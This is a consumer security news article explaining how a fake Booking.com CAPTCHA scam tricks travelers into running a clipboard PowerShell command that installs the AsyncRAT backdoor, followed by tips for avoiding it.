Beware of Fake Websites Claiming to Be Booking.com
Scammers are targeting travelers planning their vacations in a new campaign that spoofs popular online travel agency (OTA) Booking.com. The scheme, discovered by Malwarebytes Labs , uses malicious CAPTCHA forms to gain remote access to victims’ devices, allowing the attackers to collect personal and financial information.
How Booking.com Scams Work
The campaign begins with links on social media and gaming sites, including sponsored ads, that redirect to sites posing as Booking.com, an OTA through which users can search for and book flights, hotels, car rentals and other travel services.
When users click on the link, they see a fake CAPTCHA pop-up with a checkbox that gives permission to copy the data to the clipboard. The next verification prompt asks you to execute the Run command on your device using a combination of keystrokes. (FYI: This is never a legitimate CAPTCHA request.)
In the background, the malicious CAPTCHA has copied a powershell command to your clipboard. And if you follow the instructions, the command will download and execute a series of files that will install a Remote Access Tool (RAT) backdoor — identified as Backdoor.AsyncRAT — giving attackers the ability to remotely monitor and control your machine.
How to Detect and Avoid a RAT Attack on Booking.com
Check the URL
As Malwarebytes Labs notes, the domains and subdomains that scammers use to carry out this attack change frequently, and some appear more legitimate than others: (booking.)guestsalerts[.]com versus kvhandelregis[.]com, for example. To avoid falling victim to this and similar campaigns, avoid clicking on links from ads or social media posts, and instead go directly to the site you’re targeting.
Go to the site directly
Be aware that using general Google search to plan travel can make you more susceptible to malicious advertising , as cybercriminals can spoof websites to look like popular services like booking.com and display them at the top of sponsored results. You should type URLs directly into the address bar or book with the airline or hotel itself.
Be careful with CAPTCHA forms from untrusted sources
You should also be careful when following instructions from websites, CAPTCHA forms, or social media videos, such as following commands that could easily lead you to install malware .
Finally, you can disable JavaScript in your browser, which will prevent access to the clipboard, although this will likely break other websites you visit.